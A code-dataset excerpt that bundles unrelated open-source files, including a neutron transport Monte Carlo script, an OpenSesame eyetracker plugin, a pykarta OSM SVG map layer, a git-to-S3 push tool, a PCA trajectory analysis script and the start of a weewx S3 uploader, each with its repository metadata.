    logging.debug( 'Absorption half cell array: ' )
    logging.debug( str( abs_report[ 0 ] ) )
    logging.debug( 'Total absorption is: ' + \
            str( total_abs ) )
    #Store error
    abs_report[ 1 , 0 ] = abs_e_l
    abs_report[ 1 , 1 ] = abs_e_r
    #Get abs prob
    abs_report[ 2 ] = abs_report[ 0 ] / float( num_part )
    logging.debug( 'Abs probability half cell array:' )
    #BUG FIX: this log line previously printed row 1 (the errors)
    # while claiming to print the probabilities.
    logging.debug( str( abs_report[ 2 ] ) )
    #Store error for prob
    abs_report[ 3 ] = abs_report[ 1 ] / float( num_part )
    logging.debug( 'Leaving the abs_half_cell function' )
    sep()
    return( abs_report )
#This function will calculate our leakage prob
def currents( l_array , num_part ):
    '''Compute leakage-rate errors and leakage probabilities.

    l_array  -- two-element array of left/right leakage tallies
    num_part -- total number of source particles
    Returns a 3 x 2 array: row 0 = leakage rate errors, row 1 =
    leakage probabilities, row 2 = leakage probability errors.
    NOTE: unlike the other helpers, this relies on the module-level
    sep() separator rather than receiving it as an argument.
    '''
    sep()
    logging.debug( 'Entering the currents function' )
    #Allocate the report array
    cur_report = np.zeros( ( 3 , 2 ) )
    #Standard error of the leakage rates
    deviation = l_array - l_array / float( num_part )
    cur_report[ 0 ] = np.sqrt( np.square( deviation ) / \
            ( float( num_part - 1 ) ) )
    #Leakage probability for each face
    for face in range( 2 ):
        cur_report[ 1 , face ] = l_array[ face ] / float( num_part )
    #Error on the leakage probabilities
    cur_report[ 2 ] = cur_report[ 0 ] / float( num_part )
    logging.debug( 'Leaving the currents function' )
    sep()
    return( cur_report )
#This function will plot our flux
def plotter( flux , num_part , num_bins , width , cep , sep ):
    '''Plot the scalar flux as a step plot with error bars and save it
    to an image named P3Plot<num_part>.

    flux     -- 2 x num_bins array; row 0 flux values, row 1 errors
    num_part -- number of particles (used in label and file name)
    num_bins -- number of spatial bins
    width    -- bin width (cm)
    cep, sep -- logging separator callbacks
    '''
    sep()
    logging.debug( 'Entering plotting function' )
    logging.debug( 'First bins' )
    #Bin edges: 0, width, 2*width, ..., num_bins*width
    points = [ x * width for x in range( num_bins + 1 ) ]
    logging.debug( str( points ) )
    cep()
    logging.debug( 'Second bins' )
    #Duplicate every edge (then drop the outer pair) so each flux value
    # can be drawn as a flat step spanning its bin
    bins = [ x for pair in zip( points , points ) for x in pair][1:-1]
    logging.debug( str( bins ) )
    mid_points = points[ 0 : len( points ) - 1 ]
    #Shift the left edges by half a bin width to get bin centers
    mid_points = [ x + ( width / 2.0 ) for x in mid_points ]
    cep()
    logging.debug( 'mid_points array: ' )
    logging.debug( str( mid_points ) )
    cep()
    logging.debug( 'Phi' )
    cep()
    #Duplicate each flux value to pair with the duplicated edges above
    phi = [ x for pair in zip( flux[ 0 ] , flux[ 0 ] ) for x in pair ]
    phi_err = flux[ 1 ]
    logging.debug( str( phi ) )
    logging.debug( str( len( mid_points ) ) )
    logging.debug( str( len( phi_err ) ) )
    label_string = 'N = ' + str( num_part )
    save_string = 'P3Plot' + str( num_part )
    pl.plot( bins , phi , 'b-' , label = label_string )
    #Invisible markers at the bin centers anchor the error bars below
    pl.plot( mid_points , flux[ 0 ] , marker = '.' , color = 'b' , \
        visible = False )
    pl.errorbar( mid_points , flux[ 0 ] , yerr = phi_err , linestyle = 'None' )
    pl.xlabel( 'Position in cm' )
    pl.ylabel( 'Normalized Flux (#/s*cm*cm)' )
    pl.title( 'Scalar Flux Distribution' )
    pl.savefig( save_string )
    logging.debug( 'Leaving the plotting function' )
    sep()
    return
#Lets begin our neutron histories loop.
#Each call to Lifetime follows one particle from birth until it is
# absorbed or leaks; its return value accumulates into the albedo tally.
albedo = 0
for i in range( N ):
    albedo += Lifetime( collisions , absorptions , leak_array , xs , \
                        cell_length , start_pos , angle , \
                        distance , leakage , collide , col_type , \
                        location , new_angle , att_array , cep , sep )
#Now we generate the flux (currently disabled)
#Phi = flux_collision( collisions , absorptions , N , cell_length, \
#        h , sig_array, cep , sep )
#Now we plot the flux (currently disabled)
#plotter( Phi , N , h , cell_length , cep , sep )
#Now we generate the absorption information
abs_out = abs_half_cells( absorptions , N , cep , sep )
#Now we generate our leakage probabilities
leak_prob = currents( leak_array , N )
#We also print to the log file (critical level so it always appears)
sep()
logging.critical( 'The number of particles used is: ' + str( N ) )
cep()
logging.critical( 'The abs rate is: ' + str( abs_out[ 0 ] ) )
logging.critical( 'The abs rate error is: ' + str( abs_out[ 1 ] ) )
logging.critical( 'The abs prob is: ' + str( abs_out[ 2 ] ) )
logging.critical( 'The abs prob error is: ' + str( abs_out[ 3 ] ) )
cep()
logging.critical( 'The leakage rate is: ' + str( leak_array ) )
logging.critical( 'The error in leak rate is: ' + str( leak_prob[ 0 ] ) )
logging.critical( 'The leak prob is: ' + str( leak_prob[ 1 ] ) )
logging.critical( 'The leak prob error is: ' + str( leak_prob[ 2 ] ) )
cep()
logging.critical( 'The albedo number is: ' + str( albedo ) )
logging.critical( 'The albedo ratio is: ' +str( albedo * 0.5 / float( N ) ) )
#NOTE(review): this error formula mixes the raw albedo count with the
# albedo ratio inside the squared deviation -- verify it is intended.
albedo_error = math.sqrt( ( albedo - ( albedo * 0.5 / float( N ) ) )**2 \
        / ( float( N - 1 ) ) )
logging.critical( 'The albedo ratio error is: ' + str( albedo_error ) )
# Let the user know it has all ended
print "Sn CODE END!!"
print "*************************************************************"
|
ddwooten/NE255
|
HW4/4.py
|
Python
|
gpl-2.0
| 26,177
|
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
    def removeElements(self, head, val):
        """
        Remove every node whose value equals val from a singly-linked
        list and return the (possibly new) head.

        :type head: ListNode
        :type val: int
        :rtype: ListNode
        """
        # Advance past any leading nodes that match, so head is valid.
        while head is not None and head.val == val:
            head = head.next
        # Splice matching nodes out of the remainder of the list.
        cur = head
        while cur is not None and cur.next is not None:
            if cur.next.val == val:
                cur.next = cur.next.next
            else:
                cur = cur.next
        return head
|
xinqiu/My-LeetCode-Notes
|
Leetcode/203.py
|
Python
|
gpl-2.0
| 543
|
"""
This file is part of OpenSesame.
OpenSesame is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
OpenSesame is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with OpenSesame. If not, see <http://www.gnu.org/licenses/>.
"""
from libopensesame import item, exceptions
from libqtopensesame import qtplugin
import openexp.canvas
import os.path
import imp
from PyQt4 import QtGui, QtCore
class eyetracker_drift_correct(item.item):

    """
    Runtime (non-GUI) part of the drift-correction item: draws a
    fixation cross and asks the connected eyetracker to perform drift
    correction at that point.
    """

    def __init__(self, name, experiment, string = None):

        """
        Constructor.

        Arguments:
        name       -- item name
        experiment -- the experiment object

        Keyword arguments:
        string     -- item definition string (default: None)
        """

        # The item_type should match the name of the module
        self.item_type = "eyetracker_drift_correct"
        self._mode_manual = "Manual (spacebar triggered)"
        self._mode_auto = "Automatic (fixation triggered)"
        self.mode = self._mode_manual
        self.xpos = 0
        self.ypos = 0
        # Provide a short accurate description of the item's functionality
        self.description = "Drift correction plugin (part of the eyetracker plug-ins)"
        # The parent handles the rest of the construction
        item.item.__init__(self, name, experiment, string)

    def prepare(self):

        """
        Prepare the item: verify that an eyetracker connection exists.
        """

        # Pass the word on to the parent
        item.item.prepare(self)
        # The eyetracker_calibrate plugin must have created the
        # eyetracker instance before this item can run
        if not hasattr(self.experiment, "eyetracker"):
            raise exceptions.runtime_error("Please connect to the eyetracker using the the eyetracker_calibrate plugin before using any other eyetracker plugins")
        # Report success
        return True

    def run(self):

        """
        Run the item: draw a fixation cross and drift-correct on it,
        recalibrating until drift correction succeeds.
        """

        self.set_item_onset()
        try:
            x = int(self.get("xpos", _eval=True))
            y = int(self.get("ypos", _eval=True))
        except Exception:
            # Narrowed from a bare except so KeyboardInterrupt and
            # SystemExit are no longer swallowed
            raise exceptions.runtime_error("Please use numeric values for the coordinates in eyetracker_drift_correct item '%s'" % self.name)
        if not self.has("coordinates") or self.get("coordinates") == "relative":
            # Relative coordinates are offsets from the display center
            x += self.get("width") / 2
            y += self.get("height") / 2
        # Draw a fixation cross
        c = openexp.canvas.canvas(self.experiment, self.get("background"), self.get("foreground"))
        c.set_penwidth(3)
        c.line(x - 5, y, x + 5, y)
        c.line(x, y - 5, x, y + 5)
        c.show()
        # Keep drift-correcting (recalibrating on failure) until success
        while not self.experiment.eyetracker.drift_correction( (x, y), \
            self.get("mode") == self._mode_auto):
            self.experiment.eyetracker.calibrate()
            c.show()
        # Report success
        return True
class qteyetracker_drift_correct(eyetracker_drift_correct, qtplugin.qtplugin):

    """
    GUI half of the drift-correction plugin. For more information about
    GUI programming using PyQt4, see:
    <http://www.riverbankcomputing.co.uk/static/Docs/PyQt4/html/classes.html>
    """

    def __init__(self, name, experiment, string = None):

        """
        Constructor.

        Arguments:
        name       -- item name
        experiment -- the experiment object

        Keyword arguments:
        string     -- item definition string (default: None)
        """

        # Pass the word on to the parents
        eyetracker_drift_correct.__init__(self, name, experiment, string)
        qtplugin.qtplugin.__init__(self, __file__)

    def init_edit_widget(self):

        """
        Build the controls for the edit widget.
        """

        # Lock the widget until we're done creating it
        self.lock = True
        # Pass the word on to the parent
        qtplugin.qtplugin.init_edit_widget(self, False)
        self.add_combobox_control("mode", "Mode", [self._mode_manual, self._mode_auto], tooltip = "Indicates if drift correction should be manual or automatic")
        if self.has("coordinates") and self.get("coordinates") == "absolute":
            self.add_line_edit_control("xpos", "X coordinate", self.get("width") / 2)
            self.add_line_edit_control("ypos", "Y coordinate", self.get("height") / 2)
        else:
            self.add_line_edit_control("xpos", "X coordinate", 0)
            self.add_line_edit_control("ypos", "Y coordinate", 0)
        # Add a stretch to the edit_vbox, so that the controls do not
        # stretch to the bottom of the window.
        self.edit_vbox.addStretch()
        # Unlock. BUG FIX: this was 'self.lock = True', which left the
        # controls permanently locked so apply_edit_changes() always
        # bailed out; the original '# Unlock' comment shows that False
        # was intended (and edit_widget() follows the same pattern).
        self.lock = False

    def apply_edit_changes(self):

        """
        Apply the control values to the item variables.
        """

        # Abort if the parent reports failure or if the controls are locked
        if not qtplugin.qtplugin.apply_edit_changes(self, False) or self.lock:
            return False
        # Refresh the main window, so that changes become visible everywhere
        self.experiment.main_window.refresh(self.name)
        # Report success
        return True

    def edit_widget(self):

        """
        Update the controls from the item variables.
        """

        # Lock the controls, otherwise a recursive loop might arise
        # in which updating the controls causes the variables to be
        # updated, which causes the controls to be updated, etc...
        self.lock = True
        # Let the parent handle everything
        qtplugin.qtplugin.edit_widget(self)
        # Unlock
        self.lock = False
        # Return the _edit_widget
        return self._edit_widget
|
esdalmaijer/opensesame_eyetracker
|
eyetracker_drift_correct/eyetracker_drift_correct.py
|
Python
|
gpl-2.0
| 5,207
|
#!/usr/bin/env python
# Use this script instead of running lupdate directly in order to prune some
# phrases from the Qt translation files that lupdate insists on adding to the
# PortaBase translation files (because they're used directly in the code).
from os import listdir, system
from os.path import join
import re

# Regenerate the .ts files first; lupdate re-adds the unwanted contexts.
system('lupdate portabase.pro')
# Matches an entire <context> element for QFileSystemModel. re.S lets the
# element span lines; the (?!</context>) tempered dot stops the match at
# the first closing tag rather than swallowing later contexts.
pattern = re.compile(r'<context>\s*<name>QFileSystemModel((?!</context>).)+</context>\s*', re.S)
trans_dir = join('resources', 'translations')
for path in listdir(trans_dir):
    # Only PortaBase translation files (port*.ts) are rewritten
    if not path.startswith('port') or not path.endswith('.ts'):
        continue
    full_path = join(trans_dir, path)
    # Read, prune, and rewrite in place. 'with' guarantees the handles
    # are closed even on error; the original also shadowed the built-in
    # names 'file' and 'dir'.
    with open(full_path, 'r') as fh:
        content = fh.read()
    content = pattern.sub('', content)
    with open(full_path, 'w') as fh:
        fh.write(content)
|
jmbowman/portabase
|
packaging/update_translations.py
|
Python
|
gpl-2.0
| 803
|
import os
import sys
from PyQt5.QtQuick import QQuickView
# to make sure cxFreeze includes it
from fsbc.application import app
from fsui.qt import QUrl
class GameCenterView(QQuickView):
    """QQuickView that loads the game-center QML user interface.

    Resolves the qml directory either next to the frozen executable
    (cx_Freeze build) or from a hard-coded development checkout path,
    then loads ScaledUserInterface.qml from it.
    """

    def __init__(self, parent=None):
        QQuickView.__init__(self, parent)
        # sys.frozen is set by cx_Freeze; look for qml/ next to the binary
        if getattr(sys, "frozen", ""):
            qml_path = os.path.join(app.executable_dir(), "qml")
        else:
            # NOTE(review): development-only hard-coded checkout path
            qml_path = os.path.expanduser("~/git/fs-uae/fs-uae-launcher/qml")
        engine = self.engine()
        print(engine.importPathList())
        print(engine.pluginPathList())
        # engine.setPluginPathList([qml_path, "."])
        # engine.addPluginPath(qml_path)
        # engine.addImportPath(qml_path)
        # engine.setPluginPathList([qml_path, "."])
        # engine.setImportPathList([qml_path])
        # engine.addPluginPath(qml_path)
        # print("setImportPathList", [QUrl.fromLocalFile(qml_path)])
        self.setSource(
            QUrl.fromLocalFile(
                os.path.join(qml_path, "ScaledUserInterface.qml")
            )
        )
        # self.game_center_view = GameCenterView()
        # Close this window when the QML engine signals quit
        self.engine().quit.connect(self.on_quit)
        self.resize(960, 540)
        # self.game_center_widget = QWidget.createWindowContainer(
        #     self.game_center_view, parent=self)
        # self.resize(960, 540)
        # self.game_center_widget.setFocus()
        # self.game_center_widget.setFocusPolicy(Qt.TabFocus)
        # self.game_center_view.requestActivate()
        # self.setFocus()

    def on_quit(self):
        """Close the view in response to the QML engine's quit signal."""
        self.close()
|
FrodeSolheim/fs-uae-launcher
|
fsgamesys/ui/qwindow.py
|
Python
|
gpl-2.0
| 1,580
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
#
# Copyright 2014 faisal oead <fafagold@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
import sys
import arabic_reshaper
def main():
    """Reshape the Arabic text given as the first CLI argument and print it.

    Decodes argv[1] from UTF-8, applies arabic_reshaper so the glyphs
    take their correct joined presentation forms, and re-encodes to
    UTF-8 byte output (Python 2). Raises IndexError if no argument is
    supplied.
    """
    reshaped_text = arabic_reshaper.reshape(sys.argv[1].decode('utf-8'))
    print reshaped_text.encode('utf-8')
if __name__ == '__main__':
    main()
|
faisal-oead/conky-arabic-support
|
conkyar/rtl.py
|
Python
|
gpl-2.0
| 1,028
|
# encoding=utf-8
# pykarta/maps/layers/osm_svg.py
# Copyright 2013--2018, Trinity College
# Last modified: 22 October 2018
import os
import math
import re
#import gzip
from pykarta.maps.layers.base import MapLayer
from pykarta.misc.http import simple_urlopen
from pykarta.misc import file_age_in_days, SaveAtomically
#try:
# import rsvg
#except:
import pykarta.fallback.rsvg as rsvg
#=============================================================================
# Experimental layer which exports a map in SVG format from openstreetmap.org
# This is intended for printing.
#=============================================================================
class MapLayerSVG(MapLayer):
	"""Experimental printing layer: downloads the current viewport as an
	SVG export from openstreetmap.org, recolors it line-by-line, and
	renders it through rsvg.  Downloads are cached on disk.
	"""
	url_template = "https://render.openstreetmap.org/cgi-bin/export?bbox=%f,%f,%f,%f&scale=%d&format=svg"
	# Style substitutions applied to the downloaded SVG: maps the stock
	# OSM renderer colors to higher-contrast ones.  Keys not present
	# pass through unchanged.
	xlate = {
		# Brown Buildings
		"fill:rgb(74.72549%,66.27451%,66.27451%)": "fill:rgb(0%,100%,0%)",
		# Blue outline of highway=motorway
		"stroke:rgb(46.666667%,53.333333%,63.137255%)": "stroke:rgb(0%,0%,0%)",
		# Blue center highway=motorway
		"stroke:rgb(53.72549%,64.313725%,79.607843%)": "stroke:rgb(0%,0%,100%)",
		# Reddish outline of highway=primary
		"stroke:rgb(77.254902%,48.235294%,49.411765%)": "stroke:rgb(0%,0%,0%)",
		# Reddish center of highway=primary
		"stroke:rgb(86.666667%,62.352941%,62.352941%)": "stroke:rgb(90%,50%,50%)",
		# Orange outline of highway=secondary
		"stroke:rgb(80%,63.137255%,41.568627%)": "stroke:rgb(0%,0%,0%)",
		# Orange center of highway=secondary
		"stroke:rgb(97.647059%,83.921569%,66.666667%)": "stroke:rgb(100%,70%,50%)",
		# Outline of highway=tertiary
		"stroke:rgb(77.647059%,77.647059%,54.117647%)": "stroke:rgb(0%,0%,0%)",
		# Pale yellow center of highway=tertiary
		"stroke:rgb(97.254902%,97.254902%,72.941176%)": "stroke:rgb(100%,100%,70%)",
		# White center of highway=residential, also white of holos
		#"stroke:rgb(100%,100%,100%)": "stroke:rgb(100%,0%,0%)",
		# Gray border of highway=residential
		"stroke:rgb(73.333333%,73.333333%,73.333333%)": "stroke:rgb(0%,0%,0%)",
		}
	def __init__(self, source, extra_zoom=1.0):
		"""source must be "osm-default-svg"; extra_zoom further scales the
		requested export (values > 1.0 ask the server for more detail)."""
		if source != "osm-default-svg":
			raise ValueError
		MapLayer.__init__(self)
		self.source = source
		self.extra_zoom = extra_zoom
		self.attribution = u"Map © OpenStreetMap contributors"
		self.svg = None
		self.svg_scale = None
		# Matches any fill/stroke rgb() style for lookup in xlate
		self.rgb_pattern = re.compile(r"(fill|stroke):rgb\([0-9\.]+%,[0-9\.]+%,[0-9\.]+%\)")
	def set_map(self, containing_map):
		"""Attach to the map widget and create this layer's cache dir."""
		MapLayer.set_map(self, containing_map)
		self.cache_dir = os.path.join(self.containing_map.tile_cache_basedir, self.source)
		if not os.path.exists(self.cache_dir):
			os.makedirs(self.cache_dir)
	def do_viewport(self):
		"""Fetch (or load from cache) the SVG covering the current
		viewport, recolor it, and load it into an rsvg handle."""
		print "SVG layer: new viewport"
		bbox = self.containing_map.get_bbox()
		zoom = self.containing_map.get_zoom()
		# What a reading of http://svn.openstreetmap.org/applications/rendering/mapnik/zoom-to-scale.txt suggests:
		#scale = int(559082264.028 / math.pow(2, zoom) / self.extra_zoom + 0.5)
		# Determined by trial and error, produces map with expected pixel size
		scale = int(698000000 / math.pow(2, zoom) / self.extra_zoom + 0.5)
		print "SVG layer: scale:", scale
		cachefile = os.path.join(self.cache_dir, "%f_%f_%f_%f_%d.svg" % (bbox.min_lon, bbox.min_lat, bbox.max_lon, bbox.max_lat, scale))
		cachefile_age = file_age_in_days(cachefile)
		# Download the SVG file if we do not have it already in the cache
		# (cached copies are refreshed after 30 days).
		if cachefile_age is None or cachefile_age > 30:
			self.feedback.progress(0, 2, _("Requesting SVG file"))
			# FIXME: gzip compression not supported
			# See: http://love-python.blogspot.com/2008/07/accept-encoding-gzip-to-make-your.html?m=1
			url = self.url_template % (bbox.min_lon, bbox.min_lat, bbox.max_lon, bbox.max_lat, scale)
			# NOTE(review): hard-coded _osm_totp_token cookie -- these
			# tokens rotate, so this request may stop working; confirm.
			response = simple_urlopen(url, extra_headers={'Cookie':'_osm_totp_token=384781'})
			content_type = response.getheader("content-type")
			if content_type != "image/svg+xml":
				raise AssertionError("Unsupported content-type: %s" % content_type)
			content_length = int(response.getheader("content-length"))
			print "content-length:", content_length
			content_encoding = response.getheader("content-encoding")
			#if content_encoding != "gzip":
			#	raise AssertionError("Unsupported content-encoding: %s" % content_encoding)
			# Stream the body to the cache file in 64 KiB chunks;
			# SaveAtomically avoids leaving a half-written cache entry.
			fh = SaveAtomically(cachefile)
			count = 0
			while True:
				self.containing_map.feedback.progress(float(count) / float(content_length), 2, _("Downloading SVG file"))
				data = response.read(0x10000)
				if data == "":
					break
				fh.write(data)
				count += len(data)
			fh.close()
		# Load the SVG file into memory.
		self.svg = rsvg.Handle()
		#ifh = gzip.GzipFile(cachefile, "r")
		ifh = open(cachefile, "r")
		for line in ifh:
			# remove background color
			if line.startswith("<rect"):
				continue
			# Alter colors: any fill/stroke rgb() style found in xlate
			# is substituted; everything else is left alone.
			line = self.rgb_pattern.sub(lambda m: self.xlate.get(m.group(0),m.group(0)), line)
			self.svg.write(line)	# FIXME: error checking is missing
		if not self.svg.close():
			raise AssertionError("Failed to load SVG file: %s" % cachefile)
		print "SVG layer: map dimensions:", self.containing_map.width, self.containing_map.height
		width, height = self.svg.get_dimension_data()[:2]
		print "SVG layer: SVG image dimensions:", width, height
		# Scale factor that maps the SVG width onto the widget width
		self.svg_scale = float(self.containing_map.width) / float(width)
		print "SVG layer: svg_scale:", self.svg_scale
		print "done"
	def do_draw(self, ctx):
		"""Render the prepared SVG onto the supplied Cairo context."""
		print "draw"
		self.containing_map.feedback.progress(1, 2, _("Rendering SVG file"))
		ctx.scale(self.svg_scale, self.svg_scale)
		self.svg.render_cairo(ctx)
|
david672orford/pykarta
|
pykarta/maps/layers/osm_svg.py
|
Python
|
gpl-2.0
| 5,567
|
import unittest
from nose.tools import assert_equals
from dojo.taxonomy.maps import RefseqAssemblyMap
class RefseqAssemblyMapTest(unittest.TestCase):
    def test(self):
        # Smoke test: only verifies that RefseqAssemblyMap can be
        # constructed without raising.
        refseq_map = RefseqAssemblyMap()
        # NOTE(review): placeholder assertion -- it can never fail;
        # assert something about refseq_map's contents instead.
        assert_equals(None, None)
|
knights-lab/NINJA-DOJO
|
dojo/tests/test_refseq_assembly_map.py
|
Python
|
gpl-2.0
| 248
|
# Copyright (C) 2009 Abdelhalim Ragab <abdelhalim@gmail.com>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 3
# of the License or (at your option) any later version of
# the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
Created on Jul 10, 2009
@author: abdelhalim
'''
from local_repo import Gits3
from git_config import GitConfig
from amazon_s3_transport import S3Transport
import os
import sys
import getopt
def usage():
    '''Print command-line usage for the push command.'''
    print 'Usage: gits3 push <remote> <refs>'
def get_root():
    '''Return the current working directory, exiting with status 2 if
    it is not the top level of a git repository (no .git subdirectory).'''
    # get current directory
    root = os.getcwd()
    # check to see if the current folder is a Git repo
    git_dir = os.path.join(root, ".git")
    if not os.path.exists(git_dir):
        print "Should run in git repo"
        sys.exit(2)
    return root
def main(argv):
    '''Entry point: parse arguments and push local refs to an S3 remote.

    argv -- command-line arguments excluding the program name; expected
            shape is ['push', <remote>, <refs>]
    Exits with status 2 on usage errors or when not run inside a git
    repository.
    '''
    # parse the arguments
    try:
        opts, args = getopt.getopt(argv, 'h')
    except getopt.GetoptError, err:
        # print help information and exit:
        print str(err) # will print something like "option -a not recognized"
        usage()
        sys.exit(2)
    if len(args) < 3:
        usage()
        sys.exit(2)
    if args[0] != 'push':
        usage()
        sys.exit(2)
    refs = args[2]
    print 'Local Refs: ',refs
    root = get_root()
    cfg = GitConfig(root)
    url = cfg.get_remote_url()
    fetch = cfg.get_fetch()
    transport = S3Transport(url)
    advertised_refs = transport.get_advertised_refs()
    # An empty advertisement means the bucket holds no repository yet
    if len(advertised_refs) == 0:
        transport.create_new_repo(refs)
    client = Gits3(root)
    tracking_ref = client.find_tracking_ref_names(fetch, refs)
    updated_objects = client.get_updates(refs, tracking_ref)
    if updated_objects == None:
        print 'Up to date'
    else:
        # Build a pack from the new objects and upload pack + index
        base = client.generate_pack_name(updated_objects)
        client.write_pack(base, updated_objects)
        pack_name = 'pack-' + base + '.pack'
        transport.upload_pack(pack_name)
        transport.upload_pack('pack-' + base + '.idx')
        # Rewrite objects/info/packs to list every pack in the bucket
        packs = transport.get_pack_names()
        packs_str = 'P ' + pack_name + '\n'
        for pack in packs:
            packs_str = packs_str + 'P ' + pack + '\n'
        print packs_str
        transport.upload_string('objects/info/packs', packs_str)
        # Advertise the new ref ids so clients can discover them
        transport.upload_string(refs, client.get_id(refs))
        transport.upload_string('info/refs', client.get_id(refs) + '\t' + refs + '\n')
    # update local tracking refs
    pass
if __name__ == '__main__':
    main(sys.argv[1:])
|
abdelhalim/gits3
|
src/gits3/gits3.py
|
Python
|
gpl-2.0
| 3,102
|
#!/usr/bin/env python
"""
author: Guillaume Bouvier
email: guillaume.bouvier@ens-cachan.org
creation date: 01 10 2013
license: GNU GPL
Please feel free to use and modify this, but keep the above information.
Thanks!
"""
import IO
import numpy
import itertools
import scipy.spatial
import scipy.stats
import scipy.ndimage.measurements
import SOM
import glob
#from newProtocolModule import *
from SOMTools import *
import cPickle
import os
import ConfigParser
import sys
import PCA
from multiprocessing import Pool
configFileName = sys.argv[1]
Config = ConfigParser.ConfigParser()
Config.read(configFileName)
# Run parameters from the [makeVectors] section of the config file
nframe = Config.getint('makeVectors', 'nframes')
structFile = Config.get('makeVectors', 'structFile')
trajFile = Config.get('makeVectors', 'trajFile')
projection = Config.getboolean('makeVectors', 'projection')
nProcess = Config.getint('makeVectors', 'nProcess')
pool = Pool(processes=nProcess)
# ref marks the first processed frame; its eigenvectors fix the sign
# convention for all subsequent frames
ref = True
descriptorsList = []
eigenVectorsList = []
eigenValuesList = []
meansList = []
struct = IO.Structure(structFile)
mask = numpy.ones((struct.atoms.shape[0]),dtype="bool")
traj = IO.Trajectory(trajFile, struct, selectionmask=mask, nframe=nframe)
trajIndex = 0
# Process the trajectory in batches of nProcess frames: build a squared
# pairwise-distance matrix per frame, then PCA the batch in parallel.
while trajIndex < nframe:
    distMats = []
    proc = 0
    while proc < nProcess and trajIndex < nframe:
        sys.stdout.write('%s/%s'%(trajIndex+1,nframe))
        sys.stdout.write('\r')
        sys.stdout.flush()
        traj_i = traj.array[trajIndex]
        shapeTraj = traj_i.reshape(traj.natom,3)
        # Squared inter-atom distance matrix for this frame
        dist = scipy.spatial.distance.pdist(shapeTraj)
        distMat = scipy.spatial.distance.squareform(dist)**2
        mean = numpy.mean(distMat,axis=1)
        meansList.append(mean)
        distMats.append(distMat)
        proc += 1
        trajIndex += 1
    eigenVectors_eigenValues = pool.map(PCA.princomp, distMats)
    eigenVectorsPool = [e[0] for e in eigenVectors_eigenValues]
    eigenValuesPool = [e[1] for e in eigenVectors_eigenValues]
    for eigenValues in eigenValuesPool:
        eigenValuesList.append(eigenValues)
    for eigenVectors in eigenVectorsPool:
        if ref:
            # The very first frame becomes the sign reference
            eigenVectors_ref = eigenVectors
            ref = False
        # Flip eigenvector signs to align with the reference frame
        eigenVectors = eigenVectors*numpy.sign(numpy.dot(eigenVectors.T,eigenVectors_ref).diagonal())
        eigenVectorsList.append(eigenVectors.flatten())
        if projection:
            # NOTE(review): distMat here is the LAST matrix of the
            # batch, not the matrix matching these eigenvectors --
            # confirm this is intended.
            descriptor = numpy.dot(eigenVectors.T,distMat).flatten()
        else:
            descriptor = eigenVectors.T.flatten()
        descriptorsList.append(descriptor)
# Persist all arrays needed to reconstruct the descriptors later
projections = numpy.asarray(descriptorsList)
numpy.save('projections.npy', projections)
eigenVectorsList = numpy.asarray(eigenVectorsList)
numpy.save('eigenVectorsList', eigenVectorsList)
eigenValuesList = numpy.asarray(eigenValuesList)
numpy.save('eigenValues', eigenValuesList)
meansList = numpy.asarray(meansList)
numpy.save('meansList', meansList)
reconstruction = numpy.concatenate((eigenVectorsList,projections,meansList),axis=1)
numpy.save('reconstruction',reconstruction)
|
bougui505/SOM
|
application/makeVectorsFromdcd_PCA.py
|
Python
|
gpl-2.0
| 2,822
|
#
# Copyright (c) 2015-2020 Bill Madill <wm@wmadill.com>
# Derivative of extensions/alarm.py, credit to Tom Keffer <tkeffer@gmail.com>
#
# See the file LICENSE.txt for your full rights.
#
"""Upload the generated HTML files to an S3 bucket
********************************************************************************
To use this uploader, add the following to your configuration file in the
[StdReport] section:
[[S3upload]]
skin = S3upload
bucket_name = "BUCKETNAME"
In the weewx home directory, create a file named ".s3cfg" if it doesn't
already exist and set the "access_key" and "secret_key" values for the
IAM user that runs s3cmd. Refer to the s3cmd man page for details.
Set the ".s3cfg" file permissions to 0600 but DO NOT CHECK IT INTO a pulbic
git repository.
********************************************************************************
"""
import errno
import glob
import os.path
import re
import subprocess
import sys
import threading
import time
import traceback
import configobj
from weeutil.weeutil import timestamp_to_string, option_as_list
import weewx
# Inherit from the base class ReportGenerator
class S3uploadGenerator(weewx.reportengine.ReportGenerator):
"""Custom service to upload files to an S3 bucket"""
# Set up logging for both weewx 3 and weewx 4 from tkeffer's blog
# post.
# This syntax is really dorky--there must be a better way without
# having all the "self." on names. But this works as offensive
# as it is....
try:
# Test for new-style weewx logging by trying to import weeutil.logger
import weeutil.logger
import logging
log = logging.getLogger(__name__)
def logdbg(self, msg):
self.log.debug(msg)
def loginf(self, msg):
self.log.info(msg)
def logerr(self, msg):
self.log.error(msg)
except ImportError:
# Old-style weewx logging
import syslog
def logmsg(self, level, msg):
self.syslog.syslog(level, 's3uploadgenerator: %s:' % msg)
def logdbg(self, msg):
self.logmsg(self.syslog.LOG_DEBUG, msg)
def loginf(self, msg):
self.logmsg(self.syslog.LOG_INFO, msg)
def logerr(self, msg):
self.logmsg(self.syslog.LOG_ERR, msg)
def run(self):
self.logdbg("""s3uploadgenerator: start S3uploadGenerator""")
self.logdbg("s3uploadgenerator: python version: " + sys.version)
# Get the options from the configuration dictionary and credential file.
# Raise an exception if a required option is missing.
try:
